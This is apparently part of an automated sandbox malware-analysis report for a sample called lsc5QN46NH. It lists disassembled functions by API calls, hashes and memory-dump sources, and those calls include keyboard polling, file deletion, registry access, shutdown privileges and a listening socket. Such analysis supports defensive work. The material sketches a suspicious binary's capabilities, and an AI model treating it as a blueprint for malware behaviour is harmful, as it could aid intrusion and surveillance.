                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: 26461342c8df24286bf3eff5e4011940641011b05d0d1e50c8670be21aadf18d
                                                                                                                • Instruction ID: 30ef9fe2bad2bbe892ac19f2270d3c20baea2e07ae87c6cd0b4780f967d940df
                                                                                                                • Opcode Fuzzy Hash: 26461342c8df24286bf3eff5e4011940641011b05d0d1e50c8670be21aadf18d
                                                                                                                • Instruction Fuzzy Hash: 110247756006019FDB94EF24D851E6AB7E6FF89314F04895CF88A9B3A2CB30EC45CB95
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0Dj$0Ej$0Fj$3ca$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGj$_a
                                                                                                                • API String ID: 0-3163205990
                                                                                                                • Opcode ID: 8654c20fff7ffc857ea89dbb79806cb797328905965db048700a25ba5440b9b0
                                                                                                                • Instruction ID: bec5bcfc7f3141fcf00b2dc3213e3ae7d2cacdc9a6763e5727d9d1a0ee7bc401
                                                                                                                • Opcode Fuzzy Hash: 8654c20fff7ffc857ea89dbb79806cb797328905965db048700a25ba5440b9b0
                                                                                                                • Instruction Fuzzy Hash: 2E726EB5E002199BDB24CF59C8907EEB7B6FF45311F14816AE805EB391EB709A85CB90
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0066F113
                                                                                                                • _wcscmp.LIBCMT ref: 0066F128
                                                                                                                • _wcscmp.LIBCMT ref: 0066F13F
                                                                                                                  • Part of subcall function 00664385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006643A0
                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0066F16E
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F179
                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0066F195
                                                                                                                • _wcscmp.LIBCMT ref: 0066F1BC
                                                                                                                • _wcscmp.LIBCMT ref: 0066F1D3
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0066F1E5
                                                                                                                • SetCurrentDirectoryW.KERNEL32(006B8920), ref: 0066F203
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066F20D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F21A
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F22C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 1824444939-438819550
                                                                                                                • Opcode ID: 38ace7d790c71192501418e89127854a69190cf704af55fe51e70e8333e3f6cd
                                                                                                                • Instruction ID: 2d53e31e8809b62016a79b969457b3a5d77450100fd79b994a4b3aa512217a5d
                                                                                                                • Opcode Fuzzy Hash: 38ace7d790c71192501418e89127854a69190cf704af55fe51e70e8333e3f6cd
                                                                                                                • Instruction Fuzzy Hash: 2531A4365002197ADB10AFA4FC69AEE77AE9F45360F100275E904E3290DB71DF85CF64
                                                                                                                APIs
                                                                                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A20F
                                                                                                                • __swprintf.LIBCMT ref: 0066A231
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A26E
                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A293
                                                                                                                • _memset.LIBCMT ref: 0066A2B2
                                                                                                                • _wcsncpy.LIBCMT ref: 0066A2EE
                                                                                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A323
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0066A32E
                                                                                                                • RemoveDirectoryW.KERNEL32(?), ref: 0066A337
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0066A341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                • String ID: :$\$\??\%s
                                                                                                                • API String ID: 2733774712-3457252023
                                                                                                                • Opcode ID: 845ee2d403ac335d2dfe9dfdc52141a845c01f0a73963e36956676980b95ec5e
                                                                                                                • Instruction ID: 06723ab472922bc4fdafb7bd6a8c23eb95d1a8a39c1da24185ff2d12c0de679d
                                                                                                                • Opcode Fuzzy Hash: 845ee2d403ac335d2dfe9dfdc52141a845c01f0a73963e36956676980b95ec5e
                                                                                                                • Instruction Fuzzy Hash: 47319FB1500119BBDB209FA0DC49FEB77BEEF88700F1041B6F508E2260EB7196448F65
                                                                                                                APIs
                                                                                                                • GetKeyboardState.USER32(?), ref: 00660097
                                                                                                                • SetKeyboardState.USER32(?), ref: 00660102
                                                                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00660122
                                                                                                                • GetKeyState.USER32(000000A0), ref: 00660139
                                                                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00660168
                                                                                                                • GetKeyState.USER32(000000A1), ref: 00660179
                                                                                                                • GetAsyncKeyState.USER32(00000011), ref: 006601A5
                                                                                                                • GetKeyState.USER32(00000011), ref: 006601B3
                                                                                                                • GetAsyncKeyState.USER32(00000012), ref: 006601DC
                                                                                                                • GetKeyState.USER32(00000012), ref: 006601EA
                                                                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00660213
                                                                                                                • GetKeyState.USER32(0000005B), ref: 00660221
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$Async$Keyboard
                                                                                                                • String ID:
                                                                                                                • API String ID: 541375521-0
                                                                                                                • Opcode ID: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                                                                                • Instruction ID: 4a31a41cc4434d3aacc975e395506284aeafb6d91151087bd00d22e70108808c
                                                                                                                • Opcode Fuzzy Hash: 906ed54ac380cc74e122a3982ba94106c5e81db2acd152223ee51bea6e0b8671
                                                                                                                • Instruction Fuzzy Hash: 8451DA3090478829FB35DBA088547EBFFB69F12380F0845ADD5C25A6C2DAA49B8CC761
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006804AC
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0068054B
                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 006805E3
                                                                                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00680822
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0068082F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1240663315-0
                                                                                                                • Opcode ID: cf4bd73a8ce8756707e0c4f4ddd9735ed88b3014e6910eb019d0a076a154ffae
                                                                                                                • Instruction ID: ffb17535fd47f78b0ed381d89f15dc2f8907c12e58fa9345bdd273088a506805
                                                                                                                • Opcode Fuzzy Hash: cf4bd73a8ce8756707e0c4f4ddd9735ed88b3014e6910eb019d0a076a154ffae
                                                                                                                • Instruction Fuzzy Hash: 72E15E71604200AFDB54EF24C891D6BBBE6EF89314F04896DF84ADB3A2D731E945CB91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                • CoInitialize.OLE32 ref: 00678403
                                                                                                                • CoUninitialize.OLE32 ref: 0067840E
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,00692BEC,?), ref: 0067846E
                                                                                                                • IIDFromString.OLE32(?,?), ref: 006784E1
                                                                                                                • VariantInit.OLEAUT32(?), ref: 0067857B
                                                                                                                • VariantClear.OLEAUT32(?), ref: 006785DC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                • API String ID: 834269672-1287834457
                                                                                                                • Opcode ID: 4822497cc6e1d273f7dcd4ebd0b8ca50e1eb000b1a27fdae9494f00277699e5f
                                                                                                                • Instruction ID: 6cdd908f4444d226cd3446acb95cdf3923930c86da2308716492aa632210b74a
                                                                                                                • Opcode Fuzzy Hash: 4822497cc6e1d273f7dcd4ebd0b8ca50e1eb000b1a27fdae9494f00277699e5f
                                                                                                                • Instruction Fuzzy Hash: 1661B170648312AFD750DF24C848FAEB7EAAF45754F00891DF9899B291CB70ED45CB92
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1737998785-0
                                                                                                                • Opcode ID: 6131cfc235d7caf5df9f15bcb8886aa2aa843a410c4367df399ce7a7ec2829f4
                                                                                                                • Instruction ID: 01ad616cdf04e33a5154e72a65a867211b036e60813e539223cdc24de54c4e1f
                                                                                                                • Opcode Fuzzy Hash: 6131cfc235d7caf5df9f15bcb8886aa2aa843a410c4367df399ce7a7ec2829f4
                                                                                                                • Instruction Fuzzy Hash: 2821A375200210AFDB10AF64DC19B6E7BABEF04751F10C629F94ADB3A2DB30AD41CB54
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770
                                                                                                                  • Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 006638A3
                                                                                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0066394B
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0066395E
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0066397B
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0066399D
                                                                                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 006639B9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 4002782344-1173974218
                                                                                                                • Opcode ID: c894ec2f4d3c14a7638fabf241c90a16f097019ff0de1b73cafd2db8515512b3
                                                                                                                • Instruction ID: 2c3ed30f81af41f6423a1b53d0a717bc4d376dc6a83be4d43f3fe9eb23e20b68
                                                                                                                • Opcode Fuzzy Hash: c894ec2f4d3c14a7638fabf241c90a16f097019ff0de1b73cafd2db8515512b3
                                                                                                                • Instruction Fuzzy Hash: C7517C3184515DAACF09EBA0DA929EEB77AAF14304F60016DE406B72D1EF316F09CF64
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22
                                                                                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0066F440
                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0066F470
                                                                                                                • _wcscmp.LIBCMT ref: 0066F484
                                                                                                                • _wcscmp.LIBCMT ref: 0066F49F
                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 0066F53D
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0066F553
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 713712311-438819550
                                                                                                                • Opcode ID: b7f50c055758fd0a34b682837903a6d057accbfab0896b1c5f5e78a5968e2477
                                                                                                                • Instruction ID: bc746d266c5c477fabdfd6367a46e6b5ac76dc73bfce7b189869271e62e68f23
                                                                                                                • Opcode Fuzzy Hash: b7f50c055758fd0a34b682837903a6d057accbfab0896b1c5f5e78a5968e2477
                                                                                                                • Instruction Fuzzy Hash: A741907184021AAFCF54EF64DC45AEEBBB6FF14310F10416AE815A3291EB30AE94CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __itow__swprintf
                                                                                                                • String ID: 3ca$_a
                                                                                                                • API String ID: 674341424-1000881220
                                                                                                                • Opcode ID: 0d4df5fd9f22dcae88a9a0da954c80b1e8844828c00f636febc827910143e090
                                                                                                                • Instruction ID: 2886e6d997baa2c20cfd271fa19f1845d77ae42e4f0000eed16819d93d587505
                                                                                                                • Opcode Fuzzy Hash: 0d4df5fd9f22dcae88a9a0da954c80b1e8844828c00f636febc827910143e090
                                                                                                                • Instruction Fuzzy Hash: 0922CE716083109FD764DF24C881BAFB7E6AF85300F04492DF89A97392DB71EA45CB96
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 9d44ee0c84c83531a1a7e15bacbb4d8683a2dcd4dabcce3d05f40cd3a6b1e3c4
                                                                                                                • Instruction ID: 234c97531f5c9b5192d34769460d5013b195676a1086febe676d4724cf6ebd5c
                                                                                                                • Opcode Fuzzy Hash: 9d44ee0c84c83531a1a7e15bacbb4d8683a2dcd4dabcce3d05f40cd3a6b1e3c4
                                                                                                                • Instruction Fuzzy Hash: 1512AA70A00A09EFDF04CFA5D981AEEF3F6FF88300F144529E846A7290EB35A955CB55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00604750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00604743,?,?,006037AE,?), ref: 00604770
                                                                                                                  • Part of subcall function 00664A31: GetFileAttributesW.KERNEL32(?,0066370B), ref: 00664A32
                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00663B89
                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00663BD9
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00663BEA
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00663C01
                                                                                                                • FindClose.KERNEL32(00000000), ref: 00663C0A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 2649000838-1173974218
                                                                                                                • Opcode ID: 7de78a52ea4fbff9a8c60a4e00ccb66fda4080358cfeb6d90e7d59f116093ac0
                                                                                                                • Instruction ID: 75926e43679c88d642feadc10ebcc7250d23c8250fc773870d28254c7d063bd2
                                                                                                                • Opcode Fuzzy Hash: 7de78a52ea4fbff9a8c60a4e00ccb66fda4080358cfeb6d90e7d59f116093ac0
                                                                                                                • Instruction Fuzzy Hash: 52319271048384AFC305EF64C8918EFB7AAAE91304F400E1DF4D5922D1EB21EA09C797
                                                                                                                APIs
                                                                                                                  • Part of subcall function 006587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065882B
                                                                                                                  • Part of subcall function 006587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00658858
                                                                                                                  • Part of subcall function 006587E1: GetLastError.KERNEL32 ref: 00658865
                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 006651F9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                • String ID: $@$SeShutdownPrivilege
                                                                                                                • API String ID: 2234035333-194228
                                                                                                                • Opcode ID: 6cfd101f2b53af23febb8c3f8c7600dc3ae992c70b5e3e660f16df7cd7c620b4
                                                                                                                • Instruction ID: 137a17659a1c297a08f828ccc121ad309e5966d6729dd3afb201b2d3d4877733
                                                                                                                • Opcode Fuzzy Hash: 6cfd101f2b53af23febb8c3f8c7600dc3ae992c70b5e3e660f16df7cd7c620b4
                                                                                                                • Instruction Fuzzy Hash: D901D4716A16116BE7286268ACBBFFA725EDB05341F200525F903E21D2D9511E018694
                                                                                                                APIs
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006762DC
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 006762EB
                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00676307
                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00676316
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00676330
                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00676344
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
